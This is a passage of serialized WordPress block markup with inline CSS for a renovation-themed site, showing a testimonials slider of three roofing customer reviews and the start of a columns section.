{\"block_id\":\"a414e756-ff6e-46ac-9127-53f6b56c1472\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":32,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 .responsive-heading-desc-text {\n font-size: 32px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 {\n text-align: center; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-a414e756-ff6e-46ac-9127-53f6b56c1472 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-a414e756-ff6e-46ac-9127-53f6b56c1472\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:0;color:#fe8333\">Testimonials</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">Read Our Clients<br>Latest Reviews</p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:skt-blocks/testimonial-slider {\"classMigrate\":true,\"test_block\":[{\"description\":\"Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!\",\"name\":\"John Doe \",\"company\":\"Happy Customer\",\"image\":{\"id\":32,\"title\":\"team-member2\",\"filename\":\"team-member2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8f05029117\",\"delete\":\"a8ff1c4035\",\"edit\":\"ee60ba071d\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=32u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":29570,\"filesizeHumanReadable\":\"29 KB\",\"context\":\"\",\"height\":300,\"width\":272,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member2.jpg\",\"height\":300,\"width\":272,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. \",\"name\":\"RIck \\u0026amp; Peggy \",\"company\":\"Happy Customer\",\"image\":{\"id\":31,\"title\":\"team-member1\",\"filename\":\"team-member1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/team-member1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"team-member1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:38.000Z\",\"modified\":\"2021-05-25T13:48:38.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8c7518bbdc\",\"delete\":\"de8f66528c\",\"edit\":\"99bb75a0ef\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=31u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":37014,\"filesizeHumanReadable\":\"36 KB\",\"context\":\"\",\"height\":300,\"width\":269,\"orientation\":\"portrait\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/team-member1.jpg\",\"height\":300,\"width\":269,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}},{\"description\":\"I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..\",\"name\":\"Mike\",\"company\":\"Happy Customer\",\"image\":{\"id\":16,\"title\":\"blog-img\",\"filename\":\"blog-img.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/blog-img/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"blog-img\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:32.000Z\",\"modified\":\"2021-05-25T13:48:32.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"25f63e1ba1\",\"delete\":\"1ea75ab2d2\",\"edit\":\"f534b4e6c3\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=16u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":53731,\"filesizeHumanReadable\":\"52 KB\",\"context\":\"\",\"height\":400,\"width\":560,\"orientation\":\"landscape\",\"sizes\":{\"thumbnail\":{\"height\":150,\"width\":150,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\",\"orientation\":\"landscape\"},\"medium\":{\"height\":214,\"width\":300,\"url\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-300x214.jpg\",\"orientation\":\"landscape\"},\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/blog-img.jpg\",\"height\":400,\"width\":560,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}}}],\"descColor\":\"#494848\",\"companyColor\":\"#303030\",\"authorColor\":\"#303030\",\"imagePosition\":\"left\",\"nameFontSize\":21,\"nameFontFamily\":\"Poppins\",\"nameFontWeight\":\"600\",\"companyFontSize\":16,\"companyFontFamily\":\"Poppins\",\"companyFontWeight\":\"400\",\"descFontSize\":16,\"descFontFamily\":\"Poppins\",\"descFontWeight\":\"400\",\"nameSpace\":10,\"descSpace\":20,\"block_id\":\"c18fb09a\",\"imgVrPadding\":5,\"imgHrPadding\":20,\"columns\":2,\"transitionSpeed\":1000,\"autoplaySpeed\":5000,\"arrowDots\":\"dots\",\"rowGap\":20,\"columnGap\":25,\"contentPadding\":30,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\",\"arrowColor\":\"#fe8333\"} -->\n<style type=\"text/css\"> .skt-blocks-slick-carousel.skt-blocks-block-c18fb09a button.slick-arrow {\n border-width: 1px; border-radius: 0px; border-color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-c18fb09a ul.slick-dots li button:before, ul.slick-dots li.slick-active button:before {\n color: #fe8333; }\n .skt-blocks-slick-carousel.skt-blocks-block-c18fb09a .slick-arrow svg {\n fill: #fe8333; height: 20px; width: 20px; }\n .skt-blocks-tm__image img{\n width: 60px; max-width: 60px; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-color .skt-blocks-tm__content{\n background-color: #ffffff; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__content{\n background-image: url(null); background-position: center center; background-repeat: no-repeat; background-size: cover; }\n .skt-blocks-testimonial__wrap.skt-blocks-tm__bg-type-image .skt-blocks-tm__overlay{\n background-color: undefined; opacity: 0.5; }\n .skt-blocks-testimonial__wrap {\n padding-left: 12.5px; padding-right: 12.5px; margin-bottom: 20px; }\n .skt-blocks-testimonial__wrap .skt-blocks-tm__image-content {\n padding-left: 20px; padding-right: 20px; padding-top: 5px; padding-bottom: 5px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-tm__desc {\n padding: 20px; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap:before {\n border-top: 10px solid center; }\n .skt-blocks-tm__content.skin-type-bubble .skt-blocks-testinomial-text-wrap {\n background-color: center; border-radius: 0px; }\n</style><div class=\"skt-blocks-testomonial__outer-wrap skt-blocks-slick-carousel skt-blocks-tm__arrow-outside skt-blocks-block-c18fb09a\"><div class=\"is-carousel skt-blocks-tm__columns-2 skt-blocks-tm__items responsive-testimonial-slick-carousel skt-blocks-block-c18fb09a\"><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member2-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">Justin and his crew did an amazing roofing job and even fixed my kitchen ceiling for me!!! Very professional and evening. I highly recommend them!!</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">John Doe </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/team-member1-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">We are completely happy with the roofing job that Justin and his crew just finished. They were courteous and competent doing everything that I asked and more. The cost was very reasonable. </div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">RIck &amp; Peggy </span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div><div class=\"skt-blocks-testimonial__wrap  skt-blocks-tm__imgicon-style-circle skt-blocks-tm__image-position-left skt-blocks-tm__image-aligned-top skt-blocks-tm-stacked-tablet skt-blocks-tm__bg-type-color \"><div class=\"skt-blocks-tm__content skin-type-default center-aligned\" style=\"border-style:none;border-width:1;padding:30px;text-align:center\"><div class=\"skt-blocks-tm__overlay\"></div><div class=\"skt-blocks-tm__image-content\"><div class=\"skt-blocks-tm__image\"><img class=\"skt-blocks-tm-img-src\" src=\"https://sktperfectdemo.com/themepack/gbrenovate/wp-content/uploads/2021/05/blog-img-150x150.jpg\" alt=\"\"/></div></div><div class=\"skt-blocks-tm__text-wrap\"><div class=\"skt-blocks-testinomial-text-wrap\"><div class=\"skt-blocks-tm__desc\" style=\"color:#494848;margin-bottom:20px;font-family:Poppins;font-weight:400;font-size:16px\">I highly recommend Dunrite Roofing. They did a great job on my complete roof tear-off and replacement. If you\'re looking for a low-slope roofing specialist give Mike a call..</div></div><div class=\"skt-blocks-tm__meta\"><div class=\"skt-blocks-tm__meta-inner\"><div class=\"skt-blocks-testimonial-details\"><span class=\"skt-blocks-tm__author-name\" style=\"color:#303030;margin-bottom:10px;font-family:Poppins;font-weight:600;font-size:21px\">Mike</span><span class=\"skt-blocks-tm__company\" style=\"color:#303030;font-family:Poppins;font-weight:400;font-size:16px\">Happy Customer</span></div></div></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/testimonial-slider --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"ef9c7eaf-5a68-47bb-9b55-a5317264b50f\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":100,\"backgroundColor\":\"#f8f8f8\",\"backgroundType\":\"color\",\"className\":\"gb-renovation-section-5\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-5 skt-blocks-block-section-outer-wrap block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f background-type-color alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 0px; padding-right: 0px; }\n}\n .block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f.background-type-video .skt-blocks-block-section {\n background-color: rgba(248, 248, 248, 1); }\n</style><style type=\"text/css\"> .block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-ef9c7eaf-5a68-47bb-9b55-a5317264b50f.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-color:rgba(248, 248, 248, 1);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":4,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"blockId\":\"69252879-86f2-4995-8c56-c343d9beb987\"} -->\n<style type=\"text/css\"> .block-69252879-86f2-4995-8c56-c343d9beb987 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-69252879-86f2-4995-8c56-c343d9beb987 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-69252879-86f2-4995-8c56-c343d9beb987 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-69252879-86f2-4995-8c56-c343d9beb987 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-69252879-86f2-4995-8c56-c343d9beb987 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-69252879-86f2-4995-8c56-c343d9beb987 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-69252879-86f2-4995-8c56-c343d9beb987 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-69252879-86f2-4995-8c56-c343d9beb987 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-4\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"bottomPaddingMobile\":40,\"blockId\":\"c3ddb480-40df-4978-8ce9-3835250b478e\"} -->\n<style type=\"text/css\"> .block-c3ddb480-40df-4978-8ce9-3835250b478e .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-c3ddb480-40df-4978-8ce9-3835250b478e .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-c3ddb480-40df-4978-8ce9-3835250b478e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-c3ddb480-40df-4978-8ce9-3835250b478e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-c3ddb480-40df-4978-8ce9-3835250b478e .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: 40px; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-c3ddb480-40df-4978-8ce9-3835250b478e\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#303030\",\"resheadingTag\":\"h5\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":49,\"resheadFontSizeMobile\":49,\"resheadFontSizeTablet\":30,\"ressubHeadFontSize\":18,\"ressubHeadFontSizeTablet\":17,\"ressubHeadFontSizeMobile\":18,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":0,\"ressubHeadSpace\":0,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resprefixSpace\":0,\"iconTopMargin\":0,\"iconBottomMargin\":20,\"iconImage\":{\"uploading\":false,\"date\":1622024532000,\"filename\":\"project-img2.png\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"png\",\"id\":60,\"title\":\"project-img2\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/index.php/home/project-img2-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"project-img2-2\",\"status\":\"inherit\",\"modified\":1622024532000,\"mime\":\"image/png\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 26, 2021\",\"nonces\":{\"update\":\"6437ff1cd1\",\"delete\":\"38981185f9\",\"edit\":\"f643b8a315\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=60u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":5259,\"filesizeHumanReadable\":\"5 KB\",\"context\":\"\",\"height\":51,\"width\":50,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/project-img2.png\",\"height\":51,\"width\":50,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":50,\"resshowPrefix\":false,\"blockBorderRadius\":0,\"counterId\":\"fb9c616c-94f6-41ad-b52c-871ae91bc1ce\",\"opacity\":0,\"sepSpace\":0} -->\n<style type=\"text/css\"> .skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 49px !important; }\n .skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 18px !important; }\n .skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce .skt-blocks-ifb-image-content img {\n width: 50px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 30px; }\n .skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-fb9c616c-94f6-41ad-b52c-871ae91bc1ce.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 